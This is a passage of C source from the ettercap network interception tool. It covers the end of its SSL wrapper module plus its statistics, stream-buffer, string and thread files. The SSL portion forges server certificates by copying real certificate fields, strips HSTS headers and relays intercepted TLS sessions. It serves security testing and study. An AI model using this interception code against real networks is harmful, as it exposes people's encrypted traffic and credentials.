po->DATA.data; po->L3.header = po->DATA.data; po->L3.options = po->DATA.data; po->L4.header = po->DATA.data; po->L4.options = po->DATA.data; po->fwd_packet = po->DATA.data; po->packet = po->DATA.data; po->L3.proto = htons(LL_TYPE_IP); po->L3.ttl = 64; po->L4.proto = NL_TYPE_TCP; } /* * Create a self-signed certificate */ static X509 *sslw_create_selfsigned(X509 *server_cert) { X509 *out_cert; X509_EXTENSION *ext; const EVP_MD *md; int index = 0; if ((out_cert = X509_new()) == NULL) return NULL; /* Set out public key, real server name... */ X509_set_version(out_cert, X509_get_version(server_cert)); ASN1_INTEGER_set(X509_get_serialNumber(out_cert), EC_MAGIC_32); X509_set_notBefore(out_cert, X509_get_notBefore(server_cert)); X509_set_notAfter(out_cert, X509_get_notAfter(server_cert)); X509_set_pubkey(out_cert, global_pk); X509_set_subject_name(out_cert, X509_get_subject_name(server_cert)); X509_set_issuer_name(out_cert, X509_get_issuer_name(server_cert)); /* Modify the issuer a little bit */ //X509_NAME_add_entry_by_txt(X509_get_issuer_name(out_cert), "L", MBSTRING_ASC, " ", -1, -1, 0); index = X509_get_ext_by_NID(server_cert, NID_authority_key_identifier, -1); if (index >=0) { ext = X509_get_ext(server_cert, index); #ifdef HAVE_OPAQUE_RSA_DSA_DH ASN1_OCTET_STRING* os; os = X509_EXTENSION_get_data (ext); #endif if (ext) { #ifdef HAVE_OPAQUE_RSA_DSA_DH os->data[7] = 0xe7; os->data[8] = 0x7e; X509_EXTENSION_set_data (ext, os); #else ext->value->data[7] = 0xe7; ext->value->data[8] = 0x7e; #endif X509_add_ext(out_cert, ext, -1); } } /* take over SAN extension from peer certificate */ index = X509_get_ext_by_NID(server_cert, NID_subject_alt_name, index); if (index >= 0) { X509_add_ext(out_cert, X509_get_ext(server_cert, index), -1); } /* grab digest algorithm from peer certificate */ md = EVP_get_digestbynid(X509_get_signature_nid(server_cert)); if (md == NULL) { DEBUG_MSG("Error determining message digest algorithm for signing."); /* Falling back to SHA256 signing algorithm which is the default in TLS1.3 */ md = EVP_sha256(); } /* Self-sign our certificate */ if (!X509_sign(out_cert, global_pk, md)) { X509_free(out_cert); DEBUG_MSG("Error self-signing X509"); return NULL; } return out_cert; } /* * Initialize SSL stuff */ static void sslw_init(void) { SSL *dummy_ssl=NULL; #ifndef HAVE_OPENSSL_1_1_0 SSL_library_init(); #endif /* Create the two global CTX */ ssl_ctx_client = SSL_CTX_new(TLS_server_method()); ssl_ctx_server = SSL_CTX_new(TLS_client_method()); ON_ERROR(ssl_ctx_client, NULL, "Could not create client SSL CTX"); ON_ERROR(ssl_ctx_server, NULL, "Could not create server SSL CTX"); #ifdef HAVE_OPENSSL_1_0_2 SSL_CTX_set_ecdh_auto(ssl_ctx_client, 1); SSL_CTX_set_ecdh_auto(ssl_ctx_server, 1); #endif #ifdef HAVE_OPENSSL_1_1_0 ssl_conf_client = SSL_CONF_CTX_new(); ssl_conf_server = SSL_CONF_CTX_new(); SSL_CONF_CTX_set_flags(ssl_conf_client, SSL_CONF_FLAG_FILE); SSL_CONF_CTX_set_flags(ssl_conf_server, SSL_CONF_FLAG_FILE); SSL_CONF_CTX_set_ssl_ctx(ssl_conf_client, ssl_ctx_client); SSL_CONF_CTX_set_ssl_ctx(ssl_conf_server, ssl_ctx_server); /* Backward compatibility for older TLS versions and ciphers */ SSL_CONF_cmd(ssl_conf_client, "MinProtocol", "TLSv1"); SSL_CONF_cmd(ssl_conf_server, "MinProtocol", "TLSv1"); SSL_CONF_cmd(ssl_conf_client, "CipherString", "DEFAULT"); SSL_CONF_cmd(ssl_conf_server, "CipherString", "DEFAULT"); #endif if(EC_GBL_OPTIONS->ssl_pkey) { /* Get our private key from the file specified from cmd-line */ DEBUG_MSG("Using custom private key %s", EC_GBL_OPTIONS->ssl_pkey); if (SSL_CTX_use_PrivateKey_file(ssl_ctx_client, EC_GBL_OPTIONS->ssl_pkey, SSL_FILETYPE_PEM) == 0) { FATAL_ERROR("Can't open \"%s\" file : %s", EC_GBL_OPTIONS->ssl_pkey, strerror(errno)); } if (EC_GBL_OPTIONS->ssl_cert) { if (SSL_CTX_use_certificate_file(ssl_ctx_client, EC_GBL_OPTIONS->ssl_cert, SSL_FILETYPE_PEM) == 0) { FATAL_ERROR("Can't open \"%s\" file : %s", EC_GBL_OPTIONS->ssl_cert, strerror(errno)); } if (!SSL_CTX_check_private_key(ssl_ctx_client)) { FATAL_ERROR("Certificate \"%s\" does not match private key \"%s\"", EC_GBL_OPTIONS->ssl_cert, EC_GBL_OPTIONS->ssl_pkey); } } } else { /* Get our private key from our cert file */ if (SSL_CTX_use_PrivateKey_file(ssl_ctx_client, INSTALL_DATADIR"/"PROGRAM"/"CERT_FILE, SSL_FILETYPE_PEM) == 0) { DEBUG_MSG("sslw -- SSL_CTX_use_PrivateKey_file -- trying ./share/%s", CERT_FILE); if (SSL_CTX_use_PrivateKey_file(ssl_ctx_client, "./share/" CERT_FILE, SSL_FILETYPE_PEM) == 0) FATAL_ERROR("Can't open \"./share/%s\" file : %s", CERT_FILE, strerror(errno)); } } dummy_ssl = SSL_new(ssl_ctx_client); if ( (global_pk = SSL_get_privatekey(dummy_ssl)) == NULL ) FATAL_ERROR("Can't get private key from file"); SSL_free(dummy_ssl); } /* * SSL thread child function. */ EC_THREAD_FUNC(sslw_child) { struct packet_object po; int direction, ret_val, data_read; struct accepted_entry *ae; ae = (struct accepted_entry *)args; ec_thread_init(); /* We don't want this to accidentally close STDIN */ ae->fd[SSL_SERVER] = -1; /* Contact the real server */ if (sslw_sync_conn(ae) == -E_INVALID) { if (ae->fd[SSL_CLIENT] != -1) close_socket(ae->fd[SSL_CLIENT]); DEBUG_MSG("FAILED TO FIND PEER"); SAFE_FREE(ae); ec_thread_exit(); } if ((ae->status & SSL_ENABLED) && sslw_sync_ssl(ae) == -E_INVALID) { sslw_wipe_connection(ae); ec_thread_exit(); } /* A fake SYN ACK for profiles */ sslw_initialize_po(&po, NULL); po.len = 64; po.L4.flags = (TH_SYN | TH_ACK); packet_disp_data(&po, po.DATA.data, po.DATA.len); sslw_parse_packet(ae, SSL_SERVER, &po); sslw_initialize_po(&po, po.DATA.data); LOOP { data_read = 0; for(direction=0; direction<2; direction++) { ret_val = sslw_read_data(ae, direction, &po); BREAK_ON_ERROR(ret_val,ae,po); /* if we have data to read */ if (ret_val == E_SUCCESS) { data_read = 1; sslw_parse_packet(ae, direction, &po); if (po.flags & PO_DROPPED) continue; ret_val = sslw_write_data(ae, !direction, &po); BREAK_ON_ERROR(ret_val,ae,po); if ((po.flags & PO_SSLSTART) && !(ae->status & SSL_ENABLED)) { ae->status |= SSL_ENABLED; ret_val = sslw_sync_ssl(ae); BREAK_ON_ERROR(ret_val,ae,po); } sslw_initialize_po(&po, po.DATA.data); } } /* XXX - Set a proper sleep time */ /* Should we poll both fd's instead of guessing and sleeping? */ if (!data_read) ec_usleep(3000); // 3ms } return NULL; } static int sslw_remove_sts(struct packet_object *po) { u_char *ptr; u_char *end; u_char *h_end; size_t len = po->DATA.len; size_t slen = strlen("\r\nStrict-Transport-Security:"); if (!memmem(po->DATA.data, po->DATA.len, "\r\nStrict-Transport-Security:", slen)) { return -E_NOTFOUND; } ptr = po->DATA.data; end = ptr + po->DATA.len; len = end - ptr; ptr = (u_char*)memmem(ptr, len, "\r\nStrict-Transport-Security:", slen); ptr += 2; h_end = (u_char*)memmem(ptr, len, "\r\n", 2); h_end += 2; size_t before_header = ptr - po->DATA.data; size_t header_length = h_end - ptr; size_t new_len = 0; u_char *new_html; SAFE_CALLOC(new_html, len, sizeof(u_char)); BUG_IF(new_html == NULL); memcpy(new_html, po->DATA.data, before_header); new_len += before_header; memcpy(new_html+new_len, h_end, (len - header_length) - before_header); new_len += (len - header_length) - before_header; memset(po->DATA.data, '\0', po->DATA.len); memcpy(po->DATA.data, new_html, new_len); po->DATA.len = new_len; po->flags |= PO_MODIFIED; return E_SUCCESS; } /*******************************************/ /* Sessions' stuff for ssl packets */ static size_t sslw_create_ident(void **i, struct packet_object *po) { struct sslw_ident *ident; /* allocate the ident for that session */ SAFE_CALLOC(ident, 1, sizeof(struct sslw_ident)); /* the magic */ ident->magic = SSLW_MAGIC; /* prepare the ident */ memcpy(&ident->L3_src, &po->L3.src, sizeof(struct ip_addr)); ident->L4_src = po->L4.src; ident->L4_dst = po->L4.dst; /* return the ident */ *i = ident; /* return the length of the ident */ return sizeof(struct sslw_ident); } static int sslw_match(void *id_sess, void *id_curr) { struct sslw_ident *ids = id_sess; struct sslw_ident *id = id_curr; /* sanity check */ BUG_IF(ids == NULL); BUG_IF(id == NULL); /* * is this ident from our level ? * check the magic ! */ if (ids->magic != id->magic) return 0; if (ids->L4_src == id->L4_src && ids->L4_dst == id->L4_dst && !ip_addr_cmp(&ids->L3_src, &id->L3_src)) return 1; return 0; } static void sslw_create_session(struct ec_session **s, struct packet_object *po) { void *ident; DEBUG_MSG("sslw_create_session"); /* allocate the session */ SAFE_CALLOC(*s, 1, sizeof(struct ec_session)); /* create the ident */ (*s)->ident_len = sslw_create_ident(&ident, po); /* link to the session */ (*s)->ident = ident; /* the matching function */ (*s)->match = &sslw_match; /* alloc of data elements */ SAFE_CALLOC((*s)->data, 1, sizeof(struct ip_addr)); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_stats.c000664 000000 000000 00000011344 13711276346 016225 0ustar00rootroot000000 000000 /* ettercap -- statistics collection module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /************************************************/ unsigned long stats_queue_add(void) { /* increment the counter */ EC_GBL_STATS->queue_curr++; /* check if the max has to be updated */ if (EC_GBL_STATS->queue_curr > EC_GBL_STATS->queue_max) EC_GBL_STATS->queue_max = EC_GBL_STATS->queue_curr; return EC_GBL_STATS->queue_curr; } unsigned long stats_queue_del(void) { /* decrement the current counter */ EC_GBL_STATS->queue_curr--; return EC_GBL_STATS->queue_curr; } /* * gets the timeval initial value * to calculate the processing time */ void stats_half_start(struct half_stats *hs) { /* get the time */ gettimeofday(&hs->ts, 0); } /* * update the packet (num and size) counters * and get the time diff to calculate the * rate */ void stats_half_end(struct half_stats *hs, u_int len) { struct timeval diff; float ttime; float ptime; /* get the time */ gettimeofday(&hs->te, 0); time_sub(&hs->te, &hs->ts, &diff); time_add(&hs->ttot, &diff, &hs->ttot); time_add(&hs->tpar, &diff, &hs->tpar); /* calculate the rate (packet/time) */ ttime = hs->ttot.tv_sec + hs->ttot.tv_usec/1.0e6; ptime = hs->tpar.tv_sec + hs->tpar.tv_usec/1.0e6; /* update the packet count */ hs->pck_recv++; hs->pck_size += len; hs->tmp_size += len; if ( (hs->pck_recv % EC_GBL_CONF->sampling_rate) == 0 ) { /* save the average and the worst sampling */ hs->rate_adv = hs->pck_recv/ttime; if (hs->rate_worst > EC_GBL_CONF->sampling_rate/ptime || hs->rate_worst == 0) hs->rate_worst = EC_GBL_CONF->sampling_rate/ptime; hs->thru_adv = hs->pck_size/ttime; if (hs->thru_worst > hs->tmp_size/ptime || hs->thru_worst == 0) hs->thru_worst = hs->tmp_size/ptime; #if 0 DEBUG_MSG("PACKET RATE: %llu [%d] [%d] -- [%d] [%d]\n", hs->pck_recv, hs->rate_worst, hs->rate_adv, hs->thru_worst, hs->thru_adv); #endif /* reset the partial */ memset(&hs->tpar, 0, sizeof(struct timeval)); hs->tmp_size = 0; } } /* * zero the statistics. * since the stats from the kernel are not modifiable * we have to keep a delta to subtract from them to have * the count of the packets since the last call of stats_wipe() */ void stats_wipe(void) { struct pcap_stat ps; DEBUG_MSG("stats_wipe"); /* wipe top and botto half statistics */ memset(&EC_GBL_STATS->bh, 0, sizeof(struct half_stats)); memset(&EC_GBL_STATS->th, 0, sizeof(struct half_stats)); /* now the global stats */ pcap_stats(EC_GBL_IFACE->pcap, &ps); /* XXX - fix this with libpcap 0.8.2 */ #ifndef OS_LINUX EC_GBL_STATS->ps_recv_delta += ps.ps_recv; EC_GBL_STATS->ps_drop_delta += ps.ps_drop; EC_GBL_STATS->ps_sent_delta += EC_GBL_STATS->ps_sent; EC_GBL_STATS->bs_sent_delta += EC_GBL_STATS->bs_sent; #endif EC_GBL_STATS->ps_recv = 0; EC_GBL_STATS->ps_drop = 0; EC_GBL_STATS->ps_ifdrop = 0; EC_GBL_STATS->ps_sent = 0; EC_GBL_STATS->bs_sent = 0; EC_GBL_STATS->queue_max = 0; EC_GBL_STATS->queue_curr = 0; } /* * update the statistics */ void stats_update(void) { struct pcap_stat ps; struct libnet_stats ls; /* update the statistics * * statistics are available only in live capture * no statistics are stored in savefiles */ pcap_stats(EC_GBL_IFACE->pcap, &ps); /* get the statistics for Layer 3 since we forward packets here */ libnet_stats(EC_GBL_LNET->lnet_IP4, &ls); /* on systems other than linux, the counter is not reset */ EC_GBL_STATS->ps_recv = ps.ps_recv - EC_GBL_STATS->ps_recv_delta; EC_GBL_STATS->ps_drop = ps.ps_drop - EC_GBL_STATS->ps_drop_delta; /* from libnet */ EC_GBL_STATS->ps_sent = ls.packets_sent - EC_GBL_STATS->ps_sent_delta; EC_GBL_STATS->bs_sent = ls.bytes_written - EC_GBL_STATS->bs_sent_delta; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_streambuf.c000664 000000 000000 00000014117 13711276346 017060 0ustar00rootroot000000 000000 /* ettercap -- stream buffer module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* mutexes */ #define STREAMBUF_INIT_LOCK(x) do{ pthread_mutex_init(&x, NULL); }while(0) #define STREAMBUF_LOCK(x) do{ pthread_mutex_lock(&x); }while(0) #define STREAMBUF_UNLOCK(x) do{ pthread_mutex_unlock(&x); }while(0) /************************************************/ /* * initialize the buffer */ void streambuf_init(struct stream_buf *sb) { //DEBUG_MSG("streambuf_init"); /* init the size */ sb->size = 0; /* init the tail */ TAILQ_INIT(&sb->streambuf_tail); /* init the mutex */ STREAMBUF_INIT_LOCK(sb->streambuf_mutex); } /* * add the packet to the stream_buf. */ int streambuf_add(struct stream_buf *sb, struct packet_object *po) { struct stream_pck_list *p; SAFE_CALLOC(p, 1, sizeof(struct stream_pck_list)); /* fill the struct */ p->size = po->DATA.len; p->ptr = 0; /* copy the buffer */ SAFE_CALLOC(p->buf, po->DATA.len, sizeof(u_char)); memcpy(p->buf, po->DATA.data, po->DATA.len); STREAMBUF_LOCK(sb->streambuf_mutex); /* insert the packet in the tail */ TAILQ_INSERT_TAIL(&sb->streambuf_tail, p, next); /* update the total size */ sb->size += p->size; STREAMBUF_UNLOCK(sb->streambuf_mutex); return 0; } /* Insert data into the buffer only if it matches the correct * TCP sequence. It is a simple workaround used to avoid duplicated * packets in TCP streaming. If we see the same sequence twice, this * is a duplicated packet. */ int streambuf_seq_add(struct stream_buf *sb, struct packet_object *po) { /* Same seq twice? a duplicated pck */ if( sb->tcp_seq == po->L4.seq ) return 0; sb->tcp_seq = po->L4.seq; return streambuf_add(sb, po); } /* * copies in the 'buf' the first 'len' bytes * of the stream buffer * * STREAM_ATOMIC returns an error if there is not enough * data to fill 'len' bytes in 'buf' * * STREAM_PARTIAL will fill the buffer 'buf' with the data * contained in the streambuf even if it is * less than 'len'. size is returned accordingly */ int streambuf_get(struct stream_buf *sb, u_char *buf, size_t len, int mode) { struct stream_pck_list *p; struct stream_pck_list *tmp = NULL; size_t size = 0, to_copy = 0; /* check if we have enough data */ if (mode == STREAM_ATOMIC && sb->size < len) return -E_INVALID; STREAMBUF_LOCK(sb->streambuf_mutex); /* packets in the tail */ TAILQ_FOREACH_SAFE(p, &sb->streambuf_tail, next, tmp) { /* we have copied all the needed bytes */ if (size >= len) break; /* calculate the length to be copied */ if (len - size < p->size) to_copy = len - size; else to_copy = p->size; if (p->ptr + to_copy > p->size) to_copy = p->size - p->ptr; /* * copy the data in the buffer * p->ptr is the pointer to last read * byte if the buffer was read partially */ memcpy(buf + size, p->buf + p->ptr, to_copy); /* bytes in the buffer 'buf' */ size += to_copy; /* remember how may byte we have read */ p->ptr += to_copy; /* packet not completed */ if (p->ptr < p->size) { break; } /* remove the entry from the tail */ SAFE_FREE(p->buf); TAILQ_REMOVE(&sb->streambuf_tail, p, next); SAFE_FREE(p); } /* update the total size */ sb->size -= size; STREAMBUF_UNLOCK(sb->streambuf_mutex); return size; } /* Same as streambuf_get(), but this will not erase * read data from the buffer */ int streambuf_read(struct stream_buf *sb, u_char *buf, size_t len, int mode) { struct stream_pck_list *p; size_t size = 0, to_copy = 0; /* check if we have enough data */ if (mode == STREAM_ATOMIC && sb->size < len) return -E_INVALID; STREAMBUF_LOCK(sb->streambuf_mutex); /* packets in the tail */ TAILQ_FOREACH(p, &sb->streambuf_tail, next) { /* we have copied all the needed bytes */ if (size >= len) break; /* calculate the length to be copied */ if (len - size < p->size) to_copy = len - size; else to_copy = p->size; if (p->ptr + to_copy > p->size) to_copy = p->size - p->ptr; /* * copy the data in the buffer * p->ptr is the pointer to last read * byte if the buffer was read partially */ memcpy(buf + size, p->buf + p->ptr, to_copy); /* bytes in the buffer 'buf' */ size += to_copy; /* packet not completed */ if (p->ptr + to_copy < p->size) { break; } } STREAMBUF_UNLOCK(sb->streambuf_mutex); return size; } /* * empty a give buffer. * all the elements in the list are deleted */ void streambuf_wipe(struct stream_buf *sb) { struct stream_pck_list *e; DEBUG_MSG("streambuf_wipe"); STREAMBUF_LOCK(sb->streambuf_mutex); /* delete the list */ while ((e = TAILQ_FIRST(&sb->streambuf_tail)) != TAILQ_END(&sb->streambuf_tail)) { TAILQ_REMOVE(&sb->streambuf_tail, e, next); SAFE_FREE(e->buf); SAFE_FREE(e); } /* reset the buffer */ TAILQ_INIT(&sb->streambuf_tail); STREAMBUF_UNLOCK(sb->streambuf_mutex); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_strings.c000664 000000 000000 00000027244 13711276346 016566 0ustar00rootroot000000 000000 /* ettercap -- string manipulation functions Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* protos... */ #ifndef HAVE_CTYPE_H int isprint(int c); #endif static int hextoint(int c); /*******************************************/ /* implement the function if it is not available */ #ifndef HAVE_CTYPE_H int isprint(int c) { return ( (c > 31 && c < 127) ? 1 : 0 ); } #endif /* Pattern matching code from OpenSSH. */ int match_pattern(const char *s, const char *pattern) { for (;;) { if (!*pattern) return (!*s); if (*pattern == '*') { pattern++; if (!*pattern) return (1); if (*pattern != '?' && *pattern != '*') { for (; *s; s++) { if (*s == *pattern && match_pattern(s + 1, pattern + 1)) return (1); } return (0); } for (; *s; s++) { if (match_pattern(s, pattern)) return (1); } return (0); } if (!*s) return (0); if (*pattern != '?' && *pattern != *s) return (0); s++; pattern++; } /* NOTREACHED */ } /* stolen from ap_base64.c (apache source code) */ static const unsigned char pr2six[256] = { /* ASCII table */ 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64, 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64, 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64 }; int base64_decode(char *bufplain, const char *bufcoded) { int nbytesdecoded; register const unsigned char *bufin; register unsigned char *bufout; register int nprbytes; bufin = (const unsigned char *) bufcoded; while (pr2six[*(bufin++)] <= 63); nprbytes = (bufin - (const unsigned char *) bufcoded) - 1; nbytesdecoded = ((nprbytes + 3) / 4) * 3; bufout = (unsigned char *) bufplain; bufin = (const unsigned char *) bufcoded; while (nprbytes > 4) { *(bufout++) = (unsigned char) (pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); *(bufout++) = (unsigned char) (pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); *(bufout++) = (unsigned char) (pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); bufin += 4; nprbytes -= 4; } /* Note: (nprbytes == 1) would be an error, so just ingore that case */ if (nprbytes > 1) *(bufout++) = (unsigned char) (pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); if (nprbytes > 2) *(bufout++) = (unsigned char) (pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); if (nprbytes > 3) *(bufout++) = (unsigned char) (pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); nbytesdecoded -= (4 - nprbytes) & 3; bufplain[nbytesdecoded] = '\0'; return nbytesdecoded; } /* adapted from magic.c part of dsniff source code... */ /* * convert an HEX rapresentation into int */ static int hextoint(int c) { if (!isascii((int) c)) return (-1); if (isdigit((int) c)) return (c - '0'); if ((c >= 'a') && (c <= 'f')) return (c + 10 - 'a'); if ((c >= 'A') && (c <= 'F')) return (c + 10 - 'A'); return (-1); } /* * convert the escaped string into a binary one */ int strescape(char *dst, char *src, size_t len) { char *olddst = dst; char *oldsrc = src; int c; int val; while ((c = *src++) != '\0' && (size_t)(src - oldsrc) <= len) { if (c == '\\') { switch ((c = *src++)) { case '\0': goto strend; default: *dst++ = (char) c; break; case 'n': *dst++ = '\n'; break; case 'r': *dst++ = '\r'; break; case 'b': *dst++ = '\b'; break; case 't': *dst++ = '\t'; break; case 'f': *dst++ = '\f'; break; case 'v': *dst++ = '\v'; break; /* \ and up to 3 octal digits */ case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': val = c - '0'; c = *src++; /* try for 2 */ if (c >= '0' && c <= '7') { val = (val << 3) | (c - '0'); c = *src++; /* try for 3 */ if (c >= '0' && c <= '7') val = (val << 3) | (c - '0'); else if (src > oldsrc) /* protect against buffer underflow */ --src; } else if (src > oldsrc) /* protect against buffer underflow */ --src; *dst++ = (char) val; break; case 'x': val = 'x'; /* Default if no digits */ c = hextoint(*src++); /* Get next char */ if (c >= 0) { val = c; c = hextoint(*src++); if (c >= 0) val = (val << 4) + c; else if (src > oldsrc) /* protect against buffer underflow */ --src; } else if (src > oldsrc) /* protect against buffer underflow */ --src; *dst++ = (char) val; break; } } else if (c == 8 || c == 263) { /* the backspace */ if (dst > oldsrc) /* protect against buffer underflow */ dst--; } else *dst++ = (char) c; } strend: *dst = '\0'; return (dst - olddst); } /* * replace 's' with 'd' in the string 'text' * text will be realloc'ed, so a pointer is needed * and stack based array can't be used */ int str_replace(char **text, const char *s, const char *d) { size_t slen = strlen(s); size_t dlen = strlen(d); int diff = dlen - slen; char *p, *q = *text; size_t size; /* the search string does not exist */ if (strstr(*text, s) == NULL) return -E_NOTFOUND; /* search all the occurrence of 's' */ while ( (p = strstr(q, s)) != NULL ) { /* the new size */ if (diff > 0) size = strlen(q) + diff + 1; else size = strlen(q) + 1; SAFE_REALLOC(*text, size); q = *text; /* * make sure the pointer p is within the *text memory. * realloc may have moved it... */ p = strstr(q, s); if (p==NULL) continue; /* do the actual replacement */ memmove(p + dlen, p + slen, strlen(p + slen) + 1); memcpy(p, d, dlen); /* avoid recursion on substituted string */ q = p + dlen; } return E_SUCCESS; } /* * Calculate the correct length of characters in an UTF-8 encoded string. */ size_t strlen_utf8(const char *s) { u_char c; size_t len = 0; while ((c = *s++)) { if ((c & 0xC0) != 0x80) ++len; } return len; } /* * a reentrant version of strtok */ char * ec_strtok(char *s, const char *delim, char **ptrptr) { #ifdef HAVE_STRTOK_R return strtok_r(s, delim, ptrptr); #else #warning unsafe strtok /* to avoid the warning on this function (the wrapper macro) */ #undef strtok return strtok(s, delim); #endif } /* * simulate the getchar() on a buffer instead of on the stdin. * also simulate sleep with s(x) for x seconds. */ char getchar_buffer(char **buf) { char ret; DEBUG_MSG("getchar_buffer: %s", *buf); /* the buffer is empty, do nothing */ if (**buf == 0) return 0; /* simulate the sleep if we find s(x) */ if (*(*buf + 0) == 's' && *(*buf + 1) == '(') { char *p; int time = 0; p = strchr(*buf, ')'); if (p != NULL) { *p = '\0'; /* get the number of seconds to wait */ time = atoi(*buf + 2); DEBUG_MSG("getchar_buffer: sleeping %d secs", time); /* move the buffer after the s(x) */ *buf = p + 1; ec_usleep(SEC2MICRO(time)); } } /* get the first char of the buffer */ ret = *buf[0]; /* increment the buffer pointer */ *buf = *buf + 1; DEBUG_MSG("getchar_buffer: returning %c", ret); return ret; } /* convert a string of hex values into an array of bytes */ int str_hex_to_bytes(char *string, u_char *bytes) { char value[3]; /* two for the hex and the NULL terminator */ unsigned int value_bin; u_int i; size_t slen; slen = strlen(string); for (i = 0; i < slen; i++) { strncpy(value, string + i*2, 2); if (sscanf(value, "%02X", &value_bin) != 1) return -E_INVALID; bytes[i] = value_bin & 0x000000FF; } return 0; } /* print a binary string in hex format */ char * str_tohex(u_char *bin, size_t len, char *dst, size_t dst_len) { size_t i; memset(dst, 0, dst_len); for (i = 0; i < len; i++) sprintf(dst + i*2, "%02X", bin[i]); return dst; } /* split ip from port */ int ec_strsplit_ipport(char *input, char *ip, u_int16 *port) { static char ip_tmp[MAX_ASCII_ADDR_LEN]; /* Format for IPv4: 1.2.3.4:80 */ if (sscanf(input, "%20[0-9.]:%hu", ip_tmp, port) == 2) { strncpy(ip, ip_tmp, strlen(ip_tmp)+1); return E_SUCCESS; } /* Format for IPv6: [2001:db8::1]:80 */ if (sscanf(input, "[%40[0-9a-fA-F:.]]:%hu", ip_tmp, port) == 2) { strncpy(ip, ip_tmp, strlen(ip_tmp)+1); return E_SUCCESS; } DEBUG_MSG("ec_strsplit_ipport(): error splitting ip:port: '%s'\n", input); return -E_INVALID; } /* duplicate string in all letters lowercase */ const char *ec_strlc(const char *input) { char *output, *ptr; ptr = output = strdup(input); do { *ptr = tolower(*ptr); } while (*(ptr++) != 0); return output; } /* duplicate string in all letters uppercase */ const char *ec_struc(const char *input) { char *output, *ptr; ptr = output = strdup(input); do { *ptr = toupper(*ptr); } while (*(ptr++) != 0); return output; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_threads.c000664 000000 000000 00000024054 13711276346 016523 0ustar00rootroot000000 000000 /* ettercap -- thread handling Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include struct thread_list { struct ec_thread t; LIST_ENTRY (thread_list) next; }; /* global data */ /* a value to be used to return errors in fuctcions using pthread_t values */ static pthread_t EC_PTHREAD_NULL = 0; #define EC_PTHREAD_SELF EC_PTHREAD_NULL #define DETACHED_THREAD 1 #define JOINABLE_THREAD 0 static LIST_HEAD(, thread_list) thread_list_head; static pthread_mutex_t threads_mutex = PTHREAD_MUTEX_INITIALIZER; #define THREADS_LOCK do{ pthread_mutex_lock(&threads_mutex); } while(0) #define THREADS_UNLOCK do{ pthread_mutex_unlock(&threads_mutex); } while(0) static pthread_mutex_t init_mtx = PTHREAD_MUTEX_INITIALIZER; static pthread_cond_t init_cond = PTHREAD_COND_INITIALIZER; #define INIT_LOCK do{ DEBUG_MSG("thread_init_lock"); pthread_mutex_lock(&init_mtx); } while(0) #define 